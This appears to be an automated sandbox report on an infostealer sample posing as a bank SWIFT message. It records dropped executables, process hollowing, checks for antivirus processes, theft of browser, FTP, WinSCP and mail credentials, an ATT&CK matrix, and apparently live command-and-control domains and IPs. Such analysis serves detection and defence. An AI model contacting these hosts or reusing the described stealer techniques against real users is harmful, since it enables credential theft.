                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B1920C GetLocalTime,4_2_02B1920C
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B1B78C GetVersionExA,4_2_02B1B78C
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                      Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                      Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                      Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                      Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                      Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                      Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                      Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 11.0.neworigin.exe.540000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.2337075849.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2337075849.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.2422352208.00000000026FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000000.2176656166.0000000000542000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2337075849.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.2422352208.0000000002704000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.4526973764.00000000035BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.2422352208.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 6564, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 7536, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\FTP Navigator\Ftplist.txt
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 11.0.neworigin.exe.540000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.2337075849.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000000.2176656166.0000000000542000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.4526973764.00000000035BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.2422352208.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 6564, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 7536, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 11.0.neworigin.exe.540000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.2337075849.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2337075849.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.2422352208.00000000026FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000000.2176656166.0000000000542000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2337075849.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.2422352208.0000000002704000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.4526973764.00000000035BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.2422352208.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 6564, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 7536, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure1
                      Valid Accounts
                      121
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      21
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      1
                      System Time Discovery
                      1
                      Taint Shared Content
                      1
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts11
                      Native API
                      1
                      Valid Accounts
                      1
                      Valid Accounts
                      1
                      Deobfuscate/Decode Files or Information
                      11
                      Input Capture
                      1
                      System Network Connections Discovery
                      Remote Desktop Protocol2
                      Data from Local System
                      11
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Shared Modules
                      1
                      Scheduled Task/Job
                      1
                      Access Token Manipulation
                      3
                      Obfuscated Files or Information
                      1
                      Credentials in Registry
                      3
                      File and Directory Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      1
                      Non-Standard Port
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      Command and Scripting Interpreter
                      21
                      Registry Run Keys / Startup Folder
                      311
                      Process Injection
                      1
                      Timestomp
                      NTDS47
                      System Information Discovery
                      Distributed Component Object Model11
                      Input Capture
                      2
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts1
                      Scheduled Task/Job
                      Network Logon Script1
                      Scheduled Task/Job
                      1
                      DLL Side-Loading
                      LSA Secrets1
                      Query Registry
                      SSH1
                      Clipboard Data
                      123
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
                      Registry Run Keys / Startup Folder
                      311
                      Masquerading
                      Cached Domain Credentials331
                      Security Software Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Valid Accounts
                      DCSync1
                      Process Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Access Token Manipulation
                      Proc Filesystem151
                      Virtualization/Sandbox Evasion
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt151
                      Virtualization/Sandbox Evasion
                      /etc/passwd and /etc/shadow1
                      Application Window Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron311
                      Process Injection
                      Network Sniffing1
                      System Network Configuration Discovery
                      Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1555251 Sample: Ziraat_Bankasi_Swift_Mesaji... Startdate: 13/11/2024 Architecture: WINDOWS Score: 100 101 s82.gocheapweb.com 2->101 103 pywolwnvd.biz 2->103 105 2 other IPs or domains 2->105 145 Found malware configuration 2->145 147 Malicious sample detected (through community Yara rule) 2->147 149 Antivirus detection for dropped file 2->149 151 11 other signatures 2->151 11 cmd.exe 1 2->11         started        13 Wisrysxl.PIF 2->13         started        16 Wisrysxl.PIF 2->16         started        18 2 other processes 2->18 signatures3 process4 signatures5 20 x.exe 1 7 11->20         started        25 extrac32.exe 8 11->25         started        27 conhost.exe 11->27         started        161 Writes to foreign memory regions 13->161 163 Allocates memory in foreign processes 13->163 165 Sample uses process hollowing technique 13->165 29 lxsyrsiW.pif 13->29         started        167 Multi AV Scanner detection for dropped file 16->167 31 lxsyrsiW.pif 16->31         started        process6 dnsIp7 107 gxe0.com 198.252.105.91, 443, 49704, 49705 HAWKHOSTCA Canada 20->107 93 C:\Users\Public\Libraries\lxsyrsiW.pif, PE32 20->93 dropped 95 C:\Users\Public\Wisrysxl.url, MS 20->95 dropped 97 C:\Users\Public\Libraries\Wisrysxl, data 20->97 dropped 153 Multi AV Scanner detection for dropped file 20->153 155 Drops PE files with a suspicious file extension 20->155 157 Writes to foreign memory regions 20->157 159 3 other signatures 20->159 33 lxsyrsiW.pif 4 20->33         started        37 cmd.exe 1 20->37         started        39 esentutl.exe 2 20->39         started        99 C:\Users\user\AppData\Local\Temp\x.exe, PE32 25->99 dropped 41 neworigin.exe 29->41         started        43 server_BTC.exe 29->43         started        45 neworigin.exe 31->45         started        47 server_BTC.exe 31->47         started        file8 signatures9 process10 file11 81 C:\Users\user\AppData\...\server_BTC.exe, PE32 33->81 dropped 83 C:\Users\user\AppData\Local\...\neworigin.exe, PE32 33->83 dropped 85 C:\Program Files (x86)\...\armsvc.exe, PE32 33->85 dropped 113 Drops executable to a common third party application directory 33->113 115 Infects executable files (exe, dll, sys, html) 33->115 49 server_BTC.exe 33->49         started        53 neworigin.exe 15 2 33->53         started        56 esentutl.exe 2 37->56         started        58 conhost.exe 37->58         started        87 C:\Users\Public\Libraries\Wisrysxl.PIF, PE32 39->87 dropped 60 conhost.exe 39->60         started        117 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 41->117 119 Tries to steal Mail credentials (via file / registry access) 41->119 121 Tries to harvest and steal ftp login credentials 41->121 123 2 other signatures 41->123 signatures12 process13 dnsIp14 89 C:\Users\user\AppData\...\TrojanAIbot.exe, PE32 49->89 dropped 125 Antivirus detection for dropped file 49->125 127 Multi AV Scanner detection for dropped file 49->127 129 Machine Learning detection for dropped file 49->129 143 2 other signatures 49->143 62 TrojanAIbot.exe 49->62         started        65 powershell.exe 49->65         started        67 cmd.exe 49->67         started        69 schtasks.exe 49->69         started        109 s82.gocheapweb.com 51.195.88.199, 49708, 49731, 49767 